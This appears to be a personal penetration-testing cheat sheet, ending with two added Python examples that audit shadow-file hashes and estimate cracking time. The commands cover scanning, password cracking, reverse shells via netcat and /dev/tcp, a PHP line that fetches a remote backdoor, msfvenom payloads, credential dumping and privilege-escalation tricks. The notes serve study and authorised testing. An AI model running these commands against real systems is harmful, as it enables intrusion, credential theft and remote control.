2023-12-21 11:55 - Pentesting Notes

This is just a collection of information I've gained for different stages of pentesting. Take it as a dump of information, for reference.

######################################
ENUMERATION: SCANNING
######################################

#####################################
## NMAP
#####################################
nmap -v4 -A <IP>                    # Give full info
nmap --top-ports N                  # Scan top N ports - or just do `-p N`
                                    # Always make sure to scan higher port numbers to be sure
nmap -A                             # Get OS and software info - just do `-O` for OS info
nmap -Pn                            # Force scan - 'filtered' ports are firewalled
nmap --badsum                       # Check for firewalls
nmap --script="vuln"                # Scan for vulnerabilities
nmap --script="http-put"            # To upload files
nmap --script="smb-enum-shares" --script="smb-os-discovery"   # Scan samba details
nmap --script="mysql-*"             # Scrape for mysql
# Set timing with '-T<0-5>' (-T0 paranoid, -T4 aggressive) - '-A' is the aggressive scan option

#####################################
## Misc Server info
#####################################
viewdns.info                        # Get history on website DNS
dig; whois; nslookup; host
nikto -host <IP>                    # Scans host for vulnerabilities

#####################################
## Websites
#####################################
nerdydata.com
# Also scan HTML for '<!--', '@' and 'ca-pub' (google publisher ID)
gobuster dir -u <URL> -w <WORDLIST> # Scan website for subdirectories
# Add options like `-t 4` for threads and `-x txt` to add '.txt' to wordlist items

######################################
ENUMERATION: CRACKING
######################################

#####################################
## Contextual Info
#####################################
mimikatz; hashdump                  # Windows hashes with NTLM stored in SAM - user info in `System32/config`
unshadow                            # Combine user password data from `/etc/shadow` (hashes) and `/etc/passwd` (info)
# Unix stores hashes in `/etc/shadow` as 'FORMAT|ROUNDS|SALT|HASH' (fields separated by '$')
haiti                               # Use to ID hashes - SHA512 hashes prefixed with '$6$' - MD5 (Apache variant) with '$apr1$'
cat <FILE> | openssl dgst -sha256   # Hashes a file - can be used for comparison

#####################################
## Password Cracking
#####################################
john --format=raw-md5 --wordlist=<WORDLIST>
hashcat                             # Good alternative to john but never use with '--force'
john --rules=norajCommon02          # Can add rules to change wordlist processing in '/opt/john'
gpg2john                            # Extract hash from gpg files (asc) then run john on the hash file
zip2john; rar2john; ssh2john        # Extract from various files - check '/opt/john'
wordlistctl                         # Gives a set of wordlists - https://github.com/sc0tfree/mentalist
# Keyspace=CHARSET^LEN (26^4 = AAAA-ZZZZ). Hashrate=FUNC/POWER. Time=KEYSPACE/HASHRATE
hashcat -a 0 -m 0 -w 4 HASH WORDLIST    # Run against a custom wordlist (-w 4 = highest workload profile)
hashcat ... -r best64.rule --loopback   # Check for permutations
hashcat ... -a 3 -m 0 -w 4 HASH MASK    # Scan with a given mask (format)

#####################################
## Binary Cracking
#####################################
binwalk -e                          # Explore binary files
strings <FILE>                      # Look for string data within a file
gdb                                 # GNU debugger - debuggers can be complex but worth learning
radare2 <FILE>                      # Debug binaries - ?V
# [C = comments], [S = IO], [s = move]; [v = view memory], [d = debug]
# [dr/drr = register debug], [afll = view functions]
# Analyse raw 'main' functions with 'pdf @main'
yara <RULES> <FILE>                 # Pattern matching files for data - also loki, thor, fenrir
www.nextron-systems.com/valhalla/   # Online version

#####################################
## Encryption
#####################################
https://cryptii.com/pipes/caesar-cipher   # Useful for cracking ciphers
# Base62 uses a-zA-Z0-9 while base64 uses +/ as well - also check for ROT47

#####################################
## Steganography
#####################################
steghide --info <FILE>              # Shows info about hidden data in a file
steghide extract -sf <FILE>         # Extract file data inside image

######################################
ENUMERATION: LOG CRAWLING
######################################

#####################################
## PCAP
#####################################
strings                             # Crawl pcap files more efficiently than using wireshark
# ARP links IPs to MACs - check for HTTPS and find key transfers

######################################
ENUMERATION: WIFI
######################################

#####################################
## Information
#####################################
# [ESSID = SSID], [BSSID = access point], [WPA-PSK = pass], [WPA-EAP = user+pass]
wigle.net                           # Show wireless network maps by MAC

#####################################
## Cracking Passwords
#####################################
aircrack-ng -b <MAC> -w <WORDLIST> -J <OUTPUT> <INPUT>   # Cracks wifi passwords

######################################
ENUMERATION: ACTIVE DIRECTORY
######################################

#####################################
## Powershell
#####################################
runas.exe /netonly /user:DOMAIN\USER cmd.exe   # Runs CMD without DC authentication

#####################################
## Plotting AD Structure
#####################################
net user <USER> /domain             # Similarly `net group` and `get accounts`
# SharpHound enumerates and BloodHound plots - get snapshot of AD at 10am/2pm

######################################
ENUMERATION: OSINT
######################################

#####################################
## Intelligence
#####################################
otx.alienvault.com                  # Also virustotal - good for virus info
threatintelligenceplatform.com      # Performs tests on websites
maltego.com                         # Makes an OSINT mind-map - tracking things like BTC info, threats, changes, DNS
misp-project.org                    # Threat database, showing known malware and attackers
searchsploit                        # Looks up vulnerabilities in exploitdb

#####################################
## Search Engines
#####################################
# Use "" for exact matches - `:PDF` for pdf items only
# `site:URL` focuses on one page - `-site:URL` excludes it - similarly `intitle` and `inurl`
# `intitle:nginx.log` or `inurl:/certs/server.key` or `intitle:"index of"`
search.censys.io                    # Specialist search engine
shodan host <IP>

######################################
ACCESS: WEBSITES
######################################

#####################################
## Misc
#####################################
html2text                           # Extract website text into CLI

#####################################
## Injection
#####################################
# '%00' and '0x00' terminate strings - '/.' and '....//' bypass directory restrictions
# Try to change request types on the page - e.g. POST instead of GET
# If IP taken as a parameter, try '%20`ls`' or '`cat%20*`' - where '%20' is a space
?VAR=http://<IP>/shell.php          # Run file server hosting a php backdoor - then set variable to it
wp-content/themes/<THEME>/<FILE>.php   # Wordpress: add backdoor using theme page
sqlmap                              # Brute force SQL - 'OR 1=1 -- _' or ' OR 1-1 __'

#####################################
## Upload
#####################################
# Can you overwrite a website file with an upload? Or rename files? Potential backdoor upload
# Intercept page request to change client-side validation - brute force server-side
# Check MIME data, magic numbers (first bytes), size limits, name limits, content limits etc.
# Change magic numbers in hex editor - spoof MIME data by intercepting outgoing payload

#####################################
## Object Editing
#####################################
# Try adding your own cookies, based on failed/valid logins - edit JWT?
# IDOR (object reference) e.g. '?id=1234' to '?id=1000' - may be base64 or hashed
# Check for parameters in page requests: JS, APIs, hidden content

#####################################
## Cracking
#####################################
hydra -p <PASS> -L <WORDLIST> <IP> http-post-form "/PAGE?log=^USER^&pass=^PASS^:Invalid"
# Change the "Invalid" bit to some unique page data on the invalid password page
hydra -p "" -L <WORDLIST> <IP> http-get-form "/:view=^USER^^PASS^:Invalid"   # test GET requests
# Hydra may need URL directories to end in '/' or it fails

#####################################
## Poisoning
#####################################
<?php file_put_contents('shell.php', file_get_contents('http://IP/shell.php')); ?>   # Apache

######################################
ACCESS: SERVER SERVICES
######################################

#####################################
## FTP
#####################################
# FTP separates command and data channels - port 21 - try [anonymous:''] for credentials
hydra ftp://<IP> -l <USER> -P <WORDLIST> -s <PORT>   # Port usually defaults correctly

#####################################
## Mail
#####################################
telnet                              # use 'retr' to read messages, 'list' to list them and 'del' to delete them
metasploit smtp_version             # Get version info of mail server
# Check users with 'VRFY' and reveal aliases with 'EXPN'

#####################################
## SQL
#####################################
mysql -h <IP> -u <USERNAME> -p      # Remotely connect to server
mysql --user=<USER> --password=<PASS> --database=<DB> --execute ""   # Can do 'SHOW TABLES;'

#####################################
## SAMBA
#####################################
enum4linux -A                       # Scan for vulnerabilities - try [Anonymous:''] for credentials
smbclient //<IP>/<ENDPOINT>         # To connect to server
smbget                              # To copy files

######################################
ACCESS: ACTIVE DIRECTORY
######################################

#####################################
## Information
#####################################
# Find valid credentials and add domain controller to 'resolv.conf'
# NetNTLM can be internet exposed - feed valid credentials to gain access
# MDT deploys OS remotely, PXE loads OS over network - can be used to load remote OS to system

#####################################
## Exploits
#####################################
# Brute forcing passwords can cause lockout - brute forcing usernames will likely not
# Send GET with auth enabled and check responses
# LDAP pass-back = routing LDAP back to attack IP - run openLDAP on 389 (man in the middle)
# Downgrade attack: change 'ldif' with 'noanonymous,minssf=0,passcred'
# Then 'ldapsearch' for 'supportedSASLMechanisms' and get 'PLAIN/LOGIN'
# Dump network traffic on 389/TCP and find plaintext password
responder -I tun0                   # Use rogue LDAP for samba man in the middle - poison broadcasts
gpupdate /force                     # Force AD (group policy) updates

######################################
ACCESS: SHELL ACCESS
######################################

#####################################
## Information
#####################################
VAR=(a b c); ${VAR[@]}; ${VAR[1]}; unset VAR[1]; VAR[1]=B   # Bash arrays (elements are space-separated)

#####################################
## Netcat
#####################################
nc -lnvp <PORT>                     # Open reverse shell listener on attacker side
nc <IP> <PORT> -e /bin/bash         # Open a reverse shell on victim side (AFTER listener running)
netcat-traditional                  # Versions of nc can have '-e' removed for security reasons
socat TCP:<IP>:<PORT> EXEC:'bash -li'   # More stable version of netcat
nc -vl <PORT> > <FILE>              # Listen for file transfer
nc -n <IP> <PORT> < <FILE>          # Transfer file

#####################################
## Telnet
#####################################
telnet <IP> <PORT>                  # Send arbitrary data to arbitrary ports
tcpdump                             # To receive that data

#####################################
## Remote Shells
#####################################
python3 -c "import pty; pty.spawn('/bin/bash')"   # Stabilise shell with python
/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'   # Move shell to another listener
mkfifo /tmp/f; nc -lnvp <PORT> < /tmp/f | bash > /tmp/f 2>&1; rm /tmp/f   # Quick shell transfer
sudo tcpdump <IP> <PROTOCOL> \\icmp -i eth0   # reverse tunnel over tcpdump
pwncat                              # Python package for reverse shells
export TERM=xterm                   # Set terminal variables properly - so shell doesn't glitch out

######################################
ACCESS: METASPLOIT
######################################

#####################################
## Setup
#####################################
msfdb init                          # Initialise metasploit DB
msfconsole                          # Then 'search' to list modules - 'use' to select
# 'set' local vars, 'setg' global vars - 'view', 'unset', or 'save' do as you would expect
search multi/handler                # For relevant service
show options                        # See all the variables to set for a given service

#####################################
## Attack
#####################################
run -j                              # Or 'exploit' to run an attack
migrate <PID>                       # Change PID of attack shell (hide or elevate)
getuid; sysinfo; ipconfig           # Get user info, system info, network info
shell; powershell_shell             # Opens bash and powershell respectively
run post/windows/gather/checkvm     # Checks if the system is inside a windows VM

######################################
ELEVATION: WINDOWS
######################################

#####################################
## Misc
#####################################
msconfig                            # This is the main config source - '%windir% = /Windows' - compmgmt
comp-net-adapter; msinfo32          # Show network info, and system info
/setowner users                     # Try to change a restricted file property

#####################################
## Services
#####################################
# Look for services with 'Can Restart : True' - replace and 'net stop' 'net start' them

######################################
ELEVATION: PRIVESC
######################################

#####################################
## Msfvenom
#####################################
msfvenom -p cmd/unix/reverse_netcat lhost=<IP> lport=<PORT>   # Reverse netcat to your server

#####################################
## Misconfig
#####################################
find / -perm -6000 2>/dev/null | grep '/bin/'   # Look for set-UID and set-GID bits
# Unquoted directory hack: '/file name' can be ignored with a binary at '/file'
# If program run is scripted based on ENV variable - redirect that variable to something else
# Always look in /var/backup and .bash_history
sudo -l; sudo -V                    # Check info about sudo
sudo -u#-1                          # Old exploit for sudo - might still work
getcap -r / 2>/dev/null             # Find special permissions set on certain files
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'   # Exploit if found on perl

#####################################
## Cronjobs
#####################################
# If cron pointing to a website, change DNS to point to attacker IP

#####################################
## Escaping Binaries
#####################################
gtfobins.github.io                  # Escape into elevated shells from various programs that run as root
^R^X reset; sh 1>&0 2>&0            # e.g. escape nano - press enter after each ^ command
# If a python file imports a module, try to override it e.g. vim ./random.py
export PATH=/tmp:$PATH; echo -e "#!/bin/bash\n/bin/bash" > /tmp/date   # Now "date"="bash"

######################################
ELEVATION: ESCAPE CONTAINERS
######################################

#####################################
## Misc
#####################################
id; docker images                   # Check system info - find a script that refers outside the container
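The `/etc/shadow` hash layout noted under ENUMERATION: CRACKING / Contextual Info ('FORMAT|ROUNDS|SALT|HASH', '$6$' for SHA512, '$apr1$' for Apache MD5), worked through as an added example that is not part of the notes: a parser for crypt(3)-style hashes that names the algorithm from its prefix and flags legacy fast hashes for a password-storage audit. SAMPLE_SHADOW is constructed data, and the function names are my own.

```python
import re
# Added example (not from the notes): parse crypt(3)-style hashes as stored in
# /etc/shadow ('$id$[rounds=N$]salt$hash'), name the algorithm from its '$id$'
# prefix ('$6$' = sha512crypt, '$apr1$' = Apache md5crypt, ...) and flag legacy
# fast hashes for an audit. SAMPLE_SHADOW below is constructed, not real data.

ALGORITHMS = {"1": "md5crypt", "apr1": "Apache md5crypt", "5": "sha256crypt",
              "6": "sha512crypt", "y": "yescrypt", "2b": "bcrypt"}
LEGACY = {"descrypt", "md5crypt", "Apache md5crypt"}      # fast, brute-force friendly

SAMPLE_SHADOW = """\
root:$6$rounds=5000$saltsalt$Zm9vYmFyYmF6cXV4:19700:0:99999:7:::
alice:$y$j9T$saltsaltsalt$aGFzaGhhc2hoYXNo:19700:0:99999:7:::
bob:$1$saltsalt$bWQ1bWQ1bWQ1bWQ1:19700:0:99999:7:::
www-data:*:19700:0:99999:7:::
svc:!$6$saltsalt$bG9ja2VkbG9ja2Vk:19700:0:99999:7:::
"""

def parse_crypt_hash(hash_str):
    """Return (algorithm, rounds, salt, digest); rounds is None when implicit."""
    if not hash_str.startswith("$"):
        if len(hash_str) == 13:                  # legacy DES: 2-char salt + 11-char hash
            return ("descrypt", None, hash_str[:2], hash_str[2:])
        raise ValueError("not a crypt(3) hash")
    fields = hash_str.split("$")[1:]             # leading '$' gives an empty first field
    alg = ALGORITHMS.get(fields[0])
    if alg is None:
        raise ValueError("unknown algorithm id: " + fields[0])
    if alg == "bcrypt":                          # $2b$<cost>$<22-char salt><31-char hash>
        return (alg, int(fields[1]), fields[2][:22], fields[2][22:])
    rounds, rest = None, fields[1:]
    m = re.match(r"rounds=(\d+)$", rest[0])
    if m:                                        # explicit rounds field (sha256/sha512crypt)
        rounds, rest = int(m.group(1)), rest[1:]
    elif alg == "yescrypt":                      # cost parameters, e.g. 'j9T', precede the salt
        rounds, rest = rest[0], rest[1:]
    return (alg, rounds, rest[0], rest[1])

def audit_shadow(shadow_text):
    """Map user -> algorithm for accounts whose usable hash is a legacy one."""
    weak = {}
    for line in shadow_text.splitlines():
        user, hsh = line.split(":")[:2]
        if not hsh or hsh[0] in "*!":            # locked or no password set: skip
            continue
        alg = parse_crypt_hash(hsh)[0]
        if alg in LEGACY:
            weak[user] = alg
    return weak
```

Locked accounts ('*' or a leading '!') are skipped because their hash is never usable for login, so only hashes that actually protect an account are reported.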
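The cracking estimate from ENUMERATION: CRACKING / Password Cracking (Keyspace=CHARSET^LEN, Time=KEYSPACE/HASHRATE), carried through as an added example that is not from the notes: it generalises the 26^4 case to hashcat-style masks like the one in the `-a 3 ... MASK` line and compares a fast unsalted hash against a slow one, which is the defender's way of judging a password policy. The hash rates in RATES and all function names are my own assumptions, not benchmarks.

```python
# Added example (not from the notes): Keyspace = CHARSET^LEN, Time = KEYSPACE / HASHRATE
# applied to hashcat-style masks (?l lower, ?u upper, ?d digits, ?s symbols, ?a all
# printable). RATES holds illustrative guesses-per-second values, not measured numbers.

CLASS_SIZE = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}

RATES = {  # assumed for illustration only
    "raw-md5 (unsalted, fast)": 10**10,
    "sha512crypt rounds=5000 (slow)": 10**5,
}

def keyspace(mask):
    """Candidates for a mask such as '?u?l?l?l?d?d'.

    Each '?x' contributes CLASS_SIZE[x]; a literal character (or '??', an
    escaped '?') contributes 1, so '?l?l?l?l' = 26**4, the notes' AAAA-ZZZZ case."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            cls = mask[i + 1]
            total *= 1 if cls == "?" else CLASS_SIZE[cls]
            i += 2
        else:
            i += 1                                   # literal: exactly one choice
    return total

def crack_time_seconds(mask, hashrate):
    """Worst-case time to exhaust the mask: Time = KEYSPACE / HASHRATE."""
    return keyspace(mask) / hashrate

def human(seconds):
    """Render seconds in the largest applicable unit, one decimal place."""
    for unit, size in (("years", 31557600), ("days", 86400), ("hours", 3600), ("min", 60)):
        if seconds >= size:
            return "%.1f %s" % (seconds / size, unit)
    return "%.1f s" % seconds

def compare(mask, rates=RATES):
    """Exhaustion time (seconds) for one mask under each assumed hash rate."""
    return {name: crack_time_seconds(mask, rate) for name, rate in rates.items()}

if __name__ == "__main__":
    for mask in ("?l?l?l?l", "?u?l?l?l?l?l?d?d", "?a?a?a?a?a?a?a?a"):
        print(mask, "keyspace=%d" % keyspace(mask))
        for name, secs in compare(mask).items():
            print("   ", name, "->", human(secs))
```

The ratio between the two rates is what matters: the same mask that falls in seconds against raw MD5 takes five orders of magnitude longer against a slow salted scheme, which is why the slow hash is the setting to check on the servers you defend.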